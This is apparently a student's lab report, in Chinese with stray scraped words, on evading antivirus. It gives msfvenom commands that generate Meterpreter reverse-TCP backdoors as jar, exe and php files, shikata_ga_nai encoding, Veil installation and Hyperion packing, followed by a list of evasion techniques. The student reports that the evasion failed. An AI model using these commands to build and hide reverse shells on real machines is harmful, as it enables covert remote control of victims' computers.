1、正确使用msf编码器,msfvenom生成如jar之类的其余文件,veil-evasion,本身利用shellcode编程等免杀工具或技巧php
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php
1 sudo apt-get install veil 2 sudo apt-get upgrade veil
使用veilhtml
1 /usr/share/windows-binaries/hyperion/ 2 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe
因为懒惰,作本次试验拖了几天,看到不少同窗都达到了实验报告中免杀的要求,因而我就按部分同窗的制做思路,复现了一下,发现没有成功,具体状况以下java
实验感想shell
无论是经过什么方法,只要用加密壳就必定被杀,只要用反弹链接就会生成meterpreter文件也会被杀,因此只是改变编码顺序并不能避免被杀,真心但愿前面作出来的同窗教我一下如何被免杀。编程
杀软是如何检测出恶意代码的?windows
- 基于特征码
- 实时监控
- 基于行为的恶意软件检测
免杀是作什么?tcp
能够实现杀毒软件不发现、扫描不出病毒代码。工具
免杀的基本方法有哪些网站
- 改变特征码
- 加壳
- shellcode+encoder
- veil-evasion
- 半手工化
- 改变行为
- 通信方式
- 尽可能使用反弹式链接
- 使用隧道技术
- 加密通信数据
- 操做系统
- 基于内存操做
- 减小对系统的修改
- 加入混淆做用的正常功能代码
开启杀软能绝对防止电脑中恶意代码吗ui
那必定是防不住的,杀毒软件是被动的防御方式,只有恶意代码的更新才会促进杀软的升级